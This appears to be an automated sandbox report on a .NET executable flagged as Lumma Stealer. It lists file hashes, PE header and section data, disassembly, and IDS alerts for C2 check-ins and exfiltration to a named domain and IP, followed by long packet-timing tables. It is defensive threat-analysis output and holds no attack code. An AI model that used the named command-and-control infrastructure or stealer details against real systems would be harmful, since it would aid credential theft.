                        SHA1:5D8DA53593636552D0A67538370873456EC7B68F
                        SHA-256:53E10AF41DEA46EDD9C3DA16B82B0514FA087B85A31B88C5A3C2364EF218070B
                        SHA-512:CA716765FB24C7FB6F2CF26BE94282CE35454D1B3E8654FFA1D5E5740C097B5E0EDEA45B724ADE05204B9828621E1B09731FAC98C9B7C5C178DFAE7F9238982C
                        Malicious:false
                        Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):3.9202524936856595
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        • Win32 Executable (generic) a (10002005/4) 49.78%
                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        File name:ZjH6H6xqo7.exe
                        File size:44'544 bytes
                        MD5:16a1fbd21af85d43b1ac31bf1829a152
                        SHA1:522a835acc8ec09d9d74d695fb9ebaed3b2d72ff
                        SHA256:36589e0ed1c8a584dc014add50db2f2ac1c5a0cfac5403f7b7886b66e26a1d86
                        SHA512:d5d46d0b8832e58b2857ca9daad28c0dea83ba11846894995ce01d05d1be93644a50996a6b66e41db9da00282216bb96fc6f05a4ca7111b2aee4330678c30672
                        SSDEEP:768:5/EVNSVwafevGHkiV++I1gqDnJuuAuznQVLNvxu0BvkwIt6BcN4fet:5sVN7aeGEk+11Tu9AnQVLNppvk9RN4Gt
                        TLSH:9913585571FEA029D5BBEBB5BEDDACEDC89E5971182C645700C1928B4B20FE0EA43C34
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............B.... ........@.. ....................... ............`................................
                        Icon Hash:00928e8e8686b000
                        Entrypoint:0x40c342
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Time Stamp:0xEFCB81EF [Wed Jun 26 13:28:15 2097 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                        Instruction
                        jmp dword ptr [00402000h]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                         Name | Virtual Address | Virtual Size | Is in Section
                         IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                         IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc2f0 | 0x4f | .text
                         IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe000 | 0x5b0 | .rsrc
                         IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                         IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                         IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x10000 | 0xc | .reloc
                         IMAGE_DIRECTORY_ENTRY_DEBUG | 0xc2d4 | 0x1c | .text
                         IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                         IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                         IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                         IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                         IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                         IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                         IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                         IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                         IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                         Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                         .text | 0x2000 | 0xa348 | 0xa400 | abd98e17dabb73820961c263705d259f | False | 0.24018673780487804 | data | 3.9056548187424664 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                         .rsrc | 0xe000 | 0x5b0 | 0x600 | c4e0313830c3e1cae6ac422e5cf1f45f | False | 0.4186197916666667 | data | 4.137287324477428 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                         .reloc | 0x10000 | 0xc | 0x200 | 50e328932e35e54f33d1d8417285e696 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                         Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                         RT_VERSION | 0xe090 | 0x320 | data | | | 0.42375
                         RT_MANIFEST | 0xe3c0 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                         DLL | Import
                         mscoree.dll | _CorExeMain
                         Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                         2024-11-24T08:35:36.997805+0100 | 2057670 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sector-essay .cyou) | 1 | 192.168.2.5 | 61746 | 1.1.1.1 | 53 | UDP
                         2024-11-24T08:35:38.621322+0100 | 2057671 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI) | 1 | 192.168.2.5 | 49705 | 104.21.47.136 | 443 | TCP
                         2024-11-24T08:35:38.621322+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49705 | 104.21.47.136 | 443 | TCP
                         2024-11-24T08:35:39.319394+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49705 | 104.21.47.136 | 443 | TCP
                         2024-11-24T08:35:39.319394+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49705 | 104.21.47.136 | 443 | TCP
                         2024-11-24T08:35:40.735887+0100 | 2057671 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI) | 1 | 192.168.2.5 | 49706 | 104.21.47.136 | 443 | TCP
                         2024-11-24T08:35:40.735887+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49706 | 104.21.47.136 | 443 | TCP
                         2024-11-24T08:35:41.446509+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49706 | 104.21.47.136 | 443 | TCP
                         2024-11-24T08:35:41.446509+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49706 | 104.21.47.136 | 443 | TCP
                         2024-11-24T08:35:42.937475+0100 | 2057671 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI) | 1 | 192.168.2.5 | 49707 | 104.21.47.136 | 443 | TCP
                         2024-11-24T08:35:42.937475+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49707 | 104.21.47.136 | 443 | TCP
                         2024-11-24T08:35:44.950948+0100 | 2057671 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI) | 1 | 192.168.2.5 | 49708 | 104.21.47.136 | 443 | TCP
                         2024-11-24T08:35:44.950948+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49708 | 104.21.47.136 | 443 | TCP
                         2024-11-24T08:35:47.056522+0100 | 2057671 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI) | 1 | 192.168.2.5 | 49709 | 104.21.47.136 | 443 | TCP
                         2024-11-24T08:35:47.056522+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49709 | 104.21.47.136 | 443 | TCP
                         2024-11-24T08:35:49.322834+0100 | 2057671 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI) | 1 | 192.168.2.5 | 49710 | 104.21.47.136 | 443 | TCP
                         2024-11-24T08:35:49.322834+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49710 | 104.21.47.136 | 443 | TCP
                         2024-11-24T08:35:50.066874+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49710 | 104.21.47.136 | 443 | TCP
                         2024-11-24T08:35:51.956377+0100 | 2057671 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI) | 1 | 192.168.2.5 | 49711 | 104.21.47.136 | 443 | TCP
                         2024-11-24T08:35:51.956377+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49711 | 104.21.47.136 | 443 | TCP
                         2024-11-24T08:35:51.960983+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.5 | 49711 | 104.21.47.136 | 443 | TCP
                         2024-11-24T08:35:55.574111+0100 | 2057671 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI) | 1 | 192.168.2.5 | 49722 | 104.21.47.136 | 443 | TCP
                         2024-11-24T08:35:55.574111+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49722 | 104.21.47.136 | 443 | TCP
                         2024-11-24T08:35:56.299081+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49722 | 104.21.47.136 | 443 | TCP
                         Timestamp | Source Port | Dest Port | Source IP | Dest IP
                         Nov 24, 2024 08:35:33.931991100 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:34.052265882 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:34.052354097 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:34.052654982 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:34.172178984 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.318037033 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.318114042 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.318150997 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.318185091 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.318218946 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.318252087 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.318288088 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.318300962 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.318300962 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.318320990 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.318351030 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.318355083 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.318382978 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.318392038 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.318438053 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.438220024 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.438249111 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.438494921 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.510248899 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.510286093 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.510510921 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.514478922 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.514601946 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.514667988 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.522814989 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.522887945 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.522955894 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.531157017 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.531238079 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.531322956 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.539550066 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.539660931 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.539721012 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.547961950 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.548033953 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.548110962 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.556304932 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.556329966 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.556416988 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.564666986 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.564690113 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.564766884 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.573101044 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.573164940 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.573232889 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.581479073 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.581556082 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.581609964 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.589804888 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.589821100 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.589901924 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.702856064 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.702891111 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.703104973 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.705301046 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.705308914 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.705372095 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.709177971 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.709244967 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.709295988 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.714179993 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.714279890 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.714375973 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.719222069 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.719332933 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.719409943 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.724215031 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.724284887 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.724380970 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.729070902 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.729098082 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.729170084 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.733927011 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.734150887 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.734265089 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.738787889 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.738847017 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.738924026 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.743547916 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.743655920 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.743733883 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.748394966 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.748498917 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.748584986 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.753218889 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.753345966 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.753407955 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.758081913 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.758147001 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.758224010 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.763125896 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.763137102 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.763205051 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.767708063 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.767769098 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.767838001 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.772566080 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.772613049 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.772671938 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.895613909 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.895844936 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.895920992 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.897653103 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.897732973 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.897841930 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.901541948 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.901719093 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.901823997 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.905560970 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.905708075 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.905762911 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                         Nov 24, 2024 08:35:35.909508944 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.909594059 CET | 80 | 49704 | 147.45.44.131 | 192.168.2.5
                         Nov 24, 2024 08:35:35.909643888 CET | 49704 | 80 | 192.168.2.5 | 147.45.44.131
                        Nov 24, 2024 08:35:35.913503885 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.913618088 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.913674116 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.917505980 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.917588949 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.917643070 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.921485901 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.921722889 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.921785116 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.925474882 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.925576925 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.925628901 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.929488897 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.929613113 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.929754019 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.933466911 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.933546066 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.933644056 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.937491894 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.937606096 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.937674999 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.941445112 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.941567898 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.941636086 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.945485115 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.945524931 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.945594072 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.949450016 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.949568987 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.949652910 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.953500986 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.953572989 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.953660011 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.957444906 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.957540035 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.957652092 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.961438894 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.961535931 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.961591005 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.965450048 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.965570927 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.965641975 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.969520092 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.969547033 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.969604015 CET4970480192.168.2.5147.45.44.131
